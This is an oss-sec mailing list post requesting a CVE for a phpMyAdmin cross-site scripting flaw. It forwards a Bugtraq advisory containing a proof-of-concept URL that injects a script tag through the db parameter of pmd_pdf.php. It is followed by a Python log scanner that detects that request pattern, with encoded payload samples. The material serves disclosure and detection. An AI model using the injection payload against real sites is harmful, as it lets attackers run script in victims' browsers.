oss-sec mailing list archives
CVE request phpmyadmin (Fwd: XSS in phpMyadmin)
From: Hanno Böck <hanno () hboeck de>
Date: Tue, 28 Oct 2008 00:28:59 +0200
No fix yet, works also in 3.0.1.

---------- Forwarded message ----------

Subject: XSS in phpMyadmin
Date: Monday 27 October 2008
From: hadikiamarsi () hotmail com
To: bugtraq () securityfocus com

Author : Hadi Kiamarsi
-------------------------------------------
Discovered by : Hadi Kiamarsi
-------------------------------------------
Exploited By : Hadi Kiamarsi
-------------------------------------------
E-Mail : hadikiamarsi[at]hotmail.com
-------------------------------------------
web site : www.ircrash.com
-------------------------------------------
members team : Hadi Kiamarsi - khashayar fereidani - sina yazdanmehr
-------------------------------------------
Script Name : phpmyadmin ( All version )
Download Script : http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-3.0.0-all-languages.zip?download
-------------------------------------------
XSS Exploit :
register_globals=on
query : http://[www.example.com]/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script>
-------------------------------------------------------

--
Hanno Böck Blog: http://www.hboeck.de/
GPG: 3DBD3B20 Jabber/Mail: hanno () hboeck de

http://x1000malquer.de/ - stop the nuclear transports from 8.11.
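
A defensive check for the request pattern reported above, added here as an example and not part of the original message or of phpMyAdmin's code: it scans web-server access log lines for requests to pmd_pdf.php whose db parameter carries HTML metacharacters. The log entries are constructed samples in Apache access-log style, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request line inside an Apache-style access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters needed to close an attribute or open a tag; a database name
# passed in a URL has no legitimate use for them.
MARKUP = re.compile(r'[<>"\']')


def suspicious_db_value(log_line, script="pmd_pdf.php", param="db"):
    """Return the decoded parameter value if it carries markup, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if url.path.rsplit("/", 1)[-1] != script:
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double encoding.
        decoded = unquote(value)
        if key == param and MARKUP.search(decoded):
            return decoded
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_db_value(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample entries (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2008:00:31:02 +0200] "GET /phpmyadmin/pmd_pdf.php?db=shop&token=abc HTTP/1.1" 200 5120',
    '192.0.2.77 - - [28/Oct/2008:00:33:40 +0200] "GET /phpmyadmin/pmd_pdf.php?db=%3E%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5342',
    '192.0.2.77 - - [28/Oct/2008:00:33:58 +0200] "GET /phpmyadmin/pmd_pdf.php?db=%253Cscript%253E HTTP/1.1" 200 5342',
    '192.0.2.10 - - [28/Oct/2008:00:35:11 +0200] "GET /phpmyadmin/index.php?db=%3Cb%3E HTTP/1.1" 200 9811',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: db={value!r}")
```

The check only sees values carried in the query string; with register_globals=on the same variable can also be supplied in a POST body or a cookie, which access logs normally do not record.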